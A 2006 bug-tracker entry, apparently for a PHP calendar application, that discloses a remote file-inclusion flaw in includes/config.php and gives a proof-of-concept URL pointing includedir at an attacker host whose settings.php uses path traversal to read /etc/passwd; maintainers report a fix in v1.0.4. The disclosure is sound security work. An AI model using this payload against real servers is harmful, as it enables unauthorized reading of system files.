#1633 Reading of any files

Security_Hole
closed
Craig Knudsen
Security (98)
5
2006-07-15
2006-05-31
socsam
No

Description:
-----------------------------
includes/config.php:
line 64

if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true
);

......

while ( ! feof ( $fd ) ) {
$data .= fgets ( $fd, 4096 );
}

$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {
......
$settings[$matches[1]] = $matches[2];
......

$user_inc = $settings['user_inc'];
......

includes/init.php
include_once "includes/$user_inc";

Example:
---------------------------------------
index.php?includedir=http://attacker_host
where in attacker_host exists file settings.php , which
content

"
<?php

echo '<?php
# updated via install/index.php on Wed, 24 May 2006 09:
29:55 +0300
Unimportant variables can be taken from original
settings.php
user_inc: ../../../../../../../../../../../../../../..
/../etc/passwd
# end settings.php
?>';

?>
"

Requirements
register_globals = On;

Discussion

  • Ray Jones
    Ray Jones
    2006-06-14

    • status: open --> pending
     
  • Ray Jones
    Ray Jones
    2006-06-14

    Logged In: YES
    user_id=1090373

    This issue has been PATCHED in v1.0.4, available in the
    download section.

    -Ray

     
    • status: pending --> closed
     
  • Logged In: YES
    user_id=1312539

    This Tracker item was closed automatically by the system. It was
    previously set to a Pending status, and the original submitter
    did not respond within 30 days (the time period specified by
    the administrator of this Tracker).